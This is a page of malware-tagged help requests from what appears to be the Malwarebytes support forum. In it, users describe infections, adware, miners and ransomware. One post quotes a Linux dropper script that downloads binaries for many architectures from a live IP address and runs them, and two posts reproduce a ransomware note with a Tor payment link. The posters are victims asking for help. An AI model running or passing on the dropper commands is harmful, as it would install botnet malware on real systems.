Jump to content

Search the Community

Showing results for tags 'Malware'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Announcements
    • Malwarebytes News
    • Beta Testing Program
  • Malware Removal Help
    • Windows Malware Removal Help & Support
    • Mac Malware Removal Help & Support
    • Mobile Malware Removal Help & Support
    • Malware Removal Self-Help Guides
  • Malwarebytes for Home Support
    • Malwarebytes 3 Support Forum
    • Malwarebytes for Mac Support Forum
    • Malwarebytes for Android Support Forum
    • Malwarebytes for iOS Support
    • False Positives
    • Comments and Suggestions
  • Malwarebytes for Business Support
    • Malwarebytes Endpoint Protection
    • Malwarebytes Incident Response (includes Breach Remediation)
    • Malwarebytes Endpoint Security
    • Malwarebytes Business Products Comments and Suggestions
  • Malwarebytes Tools and Other Products
    • Malwarebytes AdwCleaner
    • Malwarebytes Junkware Removal Tool Support
    • Malwarebytes Anti-Rootkit BETA Support
    • Malwarebytes Techbench USB (Legacy)
    • Malwarebytes Secure Backup discontinued
    • Other Tools
    • Malwarebytes Tools Comments and Suggestions
  • General Computer Help and Security Updates
    • BSOD, Crashes, Kernel Debugging
    • General Windows PC Help
  • Research Center
    • Newest Rogue-Ransomware Threats
    • Newest Malware Threats
    • Newest Mobile Threats
    • Newest IP or URL Threats
    • Newest Mac Threats
    • Report Scam Phone Numbers
  • General
    • General Chat
    • Forums Announcements & Feedback

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Location


Interests

Found 504 results

  1. I'm running Windows 7 on my laptop. It recently started behaving strangely by attempting to delete every file I click on. The "Are you sure you want to move this file to Recycle Bin" pop up appears. When I attempt to close it,multiple pop ups appear with each attempt to close. It's to such an extent that you can't do anything practical on the machine for about 10 minutes as you try to close literally hundreds of Recycle Bin pop dialog boxes. Any help with this is greatly appreciated as I'm stuck right now
  2. I use Synmantec antivirus and like after every 10 mins it shows Miner.Bitcoinminer 7 activity detected, and normal scans can't seem to be able to get rid of it, please someone guide me on how to remove this malware.
  3. Hey there, I am Vicenç, a Spanish student in KTH Stockholm trying to finish my MSc degree. Recently, my laptop (Acer TravelMate P) has slowed down a lot. When investigating it, the performance of my CPU is questionable. When I launch internet browsers, the CPU usage spikes. In addition, my task administrator reveals processes I have no idea how they got there. After googling most of them, they are normal processes, it is just they take much RAM and CPU usage. More than one would normally expect. I noticed as well the creation of random folders with the name of '!EndpointProtectionFolderDo NotDiscard' in Files, Images, Videos and Music, when I never installed Sandblast software. The images are like this: I ran several antimalware programs in safe mode, but none of them detected any infection. The usage of memory is really strange and it is making me worried. I hope some of you can help, I would profoundly appreciate. As someone who relies heavily on his PC, 2 weeks without a laptop would be terrible. I remain at your disposal. Best, Vicenç
  4. I was using Yahoo mail in Mozilla Firefox when a warning popped up saying, "Your Windows 10 is infected with 3 viruses" The link in the address bar changed to: https://www.mscheck002.club/sk/fa9ff2ca/us/?clid=c45693d5bc364beb8cffa6e9f15eff8d9ca7&p1=74070&p2=&pre_tpl=6 Is this malware? The last time it happened I ran Malwarebytes and found nothing. Thanks
  5. Hello, I'm puzzled by the fact that I keep getting random notices that Malwarebytes has blocked an attempt to connect to members.chello.nl, which is supposedly a site infected by ransomware. I'm glad that Malwarebytes is blocking these attempts. My question is, Why is my computer making these attempts? I have never used that site. I am not trying to open that site. There seems to be some automatic process that is initiating these attempts. I assume it is some kind of malware. How do I find it and get rid of it? I've run a full Malwarebytes Premium scan, which showed zero threats. I've also run an AdwCleaner scan, with no threats detected. Thanks for any advice! Lance
  6. So i just have this weird detection were avast detects different .exe files. I cant open chrome because of this.
  7. Hi Team, Hope this finds you well. I am struggling with a virus: ”PUP.Optional.Legacy”. Initially, this virus was showing up in my malware scan. I ran through a few procedures, and now it doesn't. However, it is still showing up in my adware scan. I keep going through "clean & repair," but it does not remove the PUP. I've attached my scan logs for your review. Can you please assist with the next steps?? Kindest, Maurice AdwCleaner[S02].txt Malware scan report.txt FRST.txt Addition.txt
  8. Soundman66

    Site blocking

    I am also having the same issue. I have run all the tools to no avail. I have attached the requested files. Obviously, I don't want to just ignore the messages, I want to actually delete the adware or whatever it is. Help please. Thanks. FRST.txt Addition.txt
  9. Hello, Could you help me with my problem ? I installed a program that turned out to be a malware, installed several bad programs on my computer. I could delete them all with Malwarebytes but it changed something in the IT access and now my windows defender "virus & thread protection" and "protection updates" won't be enabled now because : Your IT administrator has limited access to some area of this app, and the item you tried to access is not available. Contact IT helpdesk for more information. It is my personal computer and it is not normal that there is these restrictions, I'm pretty sure it is because of this bad program. I've tried changing the registry for windows defender but won't work still. Would do have a solution please ?? Thanks a lot
  10. Hello everyone, I just read this article and got a little worried: https://www.howtogeek.com/fyi/bing-is-pushing-malware-when-you-search-for-chrome/ I have three quick questions that I hope someone could help me with: 1. If you actually run that phony installer, will it still act as the official installer? As in everything will act normally but you actually have a hidden malware in your Chrome? 2. If I installed Chrome a while ago, how can I check that my installation is genuine and not a fake Google Chrome? I don' have the installer anymore. 3. Would a Malwarebytes scan detect a bad installation? I ran a scan and it didn't find anything. Thank you and have an awesome day!
  11. Posted Yesterday, 01:59 PM I'm a completely novice computer user. Recently, I have been having some malware issues on my PC which is Windows 10. I already have an antivirus, Quick Heal Total Security, and recently, it detected a Coinhive mining malware on my computer, plus, it keeps showing pop up windows that it has blocked access to multiple harmful websites even when I'm accessing reliable websites like Amazon and others. I researched a bit on the Coinhive virus and found out some serious things, and so I'm currently scanning my computer for all kinds of malware, spyware, adware, rootkits using a variety of tools just to be safe. I know I'm being paranoid, but better be paranoid than have my personal data compromised. So far, I've used Malwarebytes to run a full system scan, TDSSKiller for rootkits, and a full system scan by my installed antivirus. All three of them came up clean after that one Coinhive virus was removed. I'm also planning to use more scanners like AdW, ESET, Rkill, as many as I have found to be on the safe side. Now, I started running a scan with GMER for rootkits today, in safe mode, however, the first time, mid-scan, the window just disappeared off the screen. I ran it a second time, and it only showed two entries in the log list before a message was displayed that my system had run into an error and needed to restart. I booted the computer into safe mode once again and started GMER for the third time, and same thing happened. Two logs, then mid-scan, same error message and restart. So, now I'm thinking I do have a rootkit that is stopping GMER from running a scan. I really don't know what to do right now. I also know that GMER is supposed to be for advanced users only, but my plan was to just get the results, save them and then show them to an expert, either here or if not possible, then to someone I know. However, given the fact that the scan won't even get halfway through, I don't know what to do. Would be grateful if someone could point me in the right direction. GMER not being able to complete the scan does mean that I have some kind of rootkit stopping it from working, right? Or could there be any other reasons for that? Thank you very much. P.S. I know I need to backup my data before I run any tools recommended by experts here, but I'm actually worried about infecting my backup as well. As I have already mentioned before, my computer was infected by a coinhive mining virus before, and even though it's removed now, I haven't deleted any old system restore points or registry files so it's possible the virus still persists. Plus, since my computer may have other kinds of malware right now including rootkits, if I try to back up my data now, isn't there a good possibility that I'm also infecting my back up? I back up all my data on an external hard drive, and they are even more susceptible to infection, just by plugging it in to my computer right now could transmit the malware. So, if in the end of the malware removal process, I lose some of my data and have to restore it from my backup, am I facing a chance of re-infection and also damage to my external hard drive? If so, then could you please suggest a safe way to backup all of my data? My data does not contain any applications or program files, it's only composed of documents, videos, music and images which are all stored in D and E drives, I'm not going to be backing up anything from C drive. Is there no way to safely backup, or backup in a way so that when I restore it back on the clean PC, it does not reinfect? Because I currently have some important files on my computer that I can't lose, I know there is no 100% guaranteed way that if I backup it won't be infected, but how should I reduce the risks? I don't want to lose any files by running scans with the anti-malware tools, so please point me in the right direction of backing up my files relatively safely before I can use the suggested tools and post the logs. Please suggest a safe backup method so I can proceed with the removal process.
  12. can somebody please help me malwarebites says there is a trojan in this folder C:\Windows\SysWOW64\InstallShield in the setup.exe file and i can't remove the trojan or don't know how please help me???
  13. I'm currently using Malwarebytes for PC and Android Phone, Few days ago while Scanning my Android Phone , Malwarebytes just detected a Malware the malware name is Android/PUP.Riskware.Autoins.Fota I just wanna ask if this malware is dangerous and what the virus can do to me and my phone. I search the virus name in google but the result is nothing. Hoping to get an answer.
  14. So ive got this issue where, everytime i open my league of legends client, its suddenly crash and detects the svchost.exe as a mawalre, even tho i delete it many times it just restore automatically. thanks in advance
  15. Hi, So the other day I decided to start using avg again instead of bit defender, downloaded avg and it took around 3 hours to "install", eventually I canceled this and immediately got "recycle bin is corrupted" message. I then tried to run Malwarebytes but got told I didn't have permission to use my D drive ( pc has SSD C drive with windows and D drive HDD for data). My account is definitely the admin. After some digging, I managed to boot in safe mode get Malwarebytes running on my c drive and deleted the contents of the recycle bin and all downloaded files within the last 2 weeks. However, I still don't have access to delete or edit files on my D drive so can only assume its still lurking in my files. Could anyone help? I will post my FRST file when I get back home.
  16. For the past few days, the Firefox browser on my PC has been opening up to the Microsoft or Google homepage, despite it being set to Firefox home. Changing the homepage to something else doesn't seem to work, although new tabs aren't affected. This prompted me to look in my NoScript extension, where I briefly noticed something along the lines of "cdn.immereeako". I looked it up and found a very detailed article about some "iTranslator" malware. It mentions the same browser redirect that I've experienced, as well as a folder in my (C:\ProgramData) that was created on the 22nd of this month. Unfortunately, McAfee, Spybot Search & Destroy and Malwarebytes have been unable to get rid of the issue, so I'm pretty stumped on getting rid of this thing. Addition.txt FRST.txt Malwarebytes threat scan.txt
  17. I have the same problem--smartlink.cool--but I do not want to "silence" the warning, I want to find and remove the offending source. I have performed all the steps in the post by miekiemoes but the problem remains. I also ran AdwCleaner to no avail. What can I do?
  18. The night of the 17th, I was using the Facebook app while suddenly a download in progress icon appeared in the status bar. I pulled down the notifications screen just in time to catch a glimpse of the word "attackers" followed by a bunch of symbols like $ before it disappeared. I could not find anything in the downloads folder list, ESET premium that was monitoring my phone and all downloads hadn't even detected it, and I tried in vain to search online using only the selected phrases I had managed to glimpse. Then by sheer luck, today, I managed to find a thread on this problem with the full details. The message had been "attackers on <b>%1$s</b> might atte..." with a download in progress while using Facebook app. Which I assume is completed as "might attempt to steal your information" or something. I tried using this phrase to search about it on Google, and while nothing specific to this problem came up, a list of generic information results on various types of network attacks, DDos, man in the middle and zero day attacks came up, which has me really worried. I am still using the phone as is, I really don't know much about technology related things. Please advise me what I should do now, if I should just turn off the phone or something. The person in the other thread said he had reset his phone and the problem had reappeared when he had signed into Facebook again, so now I'm not sure if a simple factory reset will help and I will probably need to install a custom ROM or something. I'm using Android 7.0 in a Samsung Galaxy J7 Prime. I got a software update to Oreo just an hour earlier and I wonder if updating the software will help remove whatever malware/spyware/hacking application got installed. Please help, I am logged into all my accounts through this phone and it's already been like 4 days since the message first appeared damage control is needed. Thank you very much. If you know anything, anything, please let me know it's very urgent.
  19. abrunel

    ADS X

    I have ADS X malware installed, and unable to delete it. Each time I search for anything I get several extra responses at the top of the result lists, and a small almost imperceprtible "ADS X" text at the right where I can close that irrelevant results, but still the listing has several bad responses. MALWAREBYTES was unable to remove that ADS X , Malwarebytes is not aware of it existence. REIMAGE CLEANER detects the malware but I don't want to pay them for the removal. Why Malwarebytes is not detecting it but others do? ....
  20. I have noticed that all of the tech-support scammers use GoToAssist to control people’s PC’s. Does any legitimate company use this software? Is there any prospect on getting this classified as a potentially unwanted program or something?
  21. activity

    Linux Weird files.

    Hello people of the malwarebytes forums. I'm a new linux user and I've ran into this bins.sh from a site. I don't really know what it does. So if someone could shed some light on it would be greatly appreciated #!/bin/bash cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.mips; chmod +x sirius.mips; ./sirius.mips; rm -rf sirius.mips cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.mpsl; chmod +x sirius.mpsl; ./sirius.mpsl; rm -rf sirius.mpsl cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.sh4; chmod +x sirius.sh4; ./sirius.sh4; rm -rf sirius.sh4 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.x86; chmod +x sirius.x86; ./sirius.x86; rm -rf sirius.x86 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.arm6; chmod +x sirius.arm6; ./sirius.arm6; rm -rf sirius.arm6 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.x32; chmod +x sirius.x32; ./sirius.x32; rm -rf sirius.x32 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.ppc; chmod +x sirius.ppc; ./sirius.ppc; rm -rf sirius.ppc cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.i586; chmod +x sirius.i586; ./sirius.i586; rm -rf sirius.i586 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.m68k; chmod +x sirius.m68k; ./sirius.m68k; rm -rf sirius.m68k cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.ppc; chmod +x sirius.ppc; ./sirius.ppc; rm -rf sirius.ppc cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.arm4; chmod +x sirius.arm4; ./sirius.arm4; rm -rf sirius.arm4 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.arm5; chmod +x sirius.arm5; ./sirius.arm5; rm -rf sirius.arm5 Also don't know if this is in the right section or not so please move it if It's not.
  22. Recently been attacked, all my files have now changed to ,pptx type, no matter what type of file is on my system audio video exe all are changed to powerpoint file type i have tried almost every tool for decryption but no use, also identification methods online cant identify it as well i need help cuz all my data is very important to me and cant access it any news for the same attack or any progress in decrypting it will a help hope this gets over soon here is the message present in every folder in a text document: Your files are Encrypted! For data recovery needs decryptor. How to buy decryptor: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. Open this link In the "Tor Browser" http://huhighwfn4jihtlz.onion/sdlsgdewwbhr Note! This link is available via "Tor Browser" only. ------------------------------------------------------------ Free decryption as guarantee. Before paying you can send us 2 file for free decryption. ------------------------------------------------------------ You unique ID so n so ( a very long id)
  23. Hi I have the same problem with my desktop computer. All my files were changed to .PPTX. I need someone willing to help please. All the encrypted file are too important. I can't just delete them. Here's the same note they left. Your files are Encrypted! For data recovery needs decryptor. How to buy decryptor: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. Open this link In the "Tor Browser" http://huhighwfn4jihtlz.onion/sdlsgdewwbhr Note! This link is available via "Tor Browser" only. ------------------------------------------------------------ Free decryption as guarantee. Before paying you can send us 2 file for free decryption. ------------------------------------------------------------ You unique ID 6C 6D 88 01 C4 55 06 B2 F8 17 13 E4 BC 98 AA FB 02 11 FD 90 2D EE 08 6E AF 32 E5 20 3C 52 16 F8 B6 9B 0B 12 35 53 14 DF FF 71 F4 BF B9 6B A9 90 7B 4B 3E B8 84 C8 B5 D0 3C 93 24 FE 27 EB 93 49 7D A1 CE 39 28 57 34 B4 CB 5D F3 EB 39 80 FB 31 9E FA CD 54 0A 43 D9 05 0C B5 01 0E 50 84 6F 6A 10 51 2D 47 06 D5 C7 F2 EC 8F AD D8 06 FC FE 8D BE 5A BF 25 36 94 22 F7 45 9F 8C 9B F3 CC 0D 89 99 D3 94 14 4D AA F2 23 53 9E 6F A3 15 E6 89 2D C6 84 E0 95 2E D2 7E 05 56 06 08 93 C7 6B A1 FC 99 ED D7 45 8F 3F DC F9 B7 61 9D F9 D2 01 B8 E5 74 39 2E 86 00 AE C7 9A 3A 83 40 33 6F 80 20 2C 8A 69 8C 9C 06 57 A2 CB 1B 02 A1 65 8F 1E CD 5C C5 1F 0A E8 EE 8B 85 6A AB 15 C4 16 AE 68 AD 18 FA 13 7A B8 4A 4B 3D CA 28 EA 5E D7 91 93 FE 80 5D 8F 35 50 EE CE C5 B7 AE 63 34 6E EF 8F 7F A8
  24. Please help me. I have this problem too, all my files changed to .pptx. Here to find the alternatives. Thanks.
  25. HI Everyone, I installed a file on my WIN 10 machine today. After installing it is not opening , and when trying to delete it from Control Panel I get an error runtime error could not call proc (at 399:4752).. Can someone please help>???
×

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.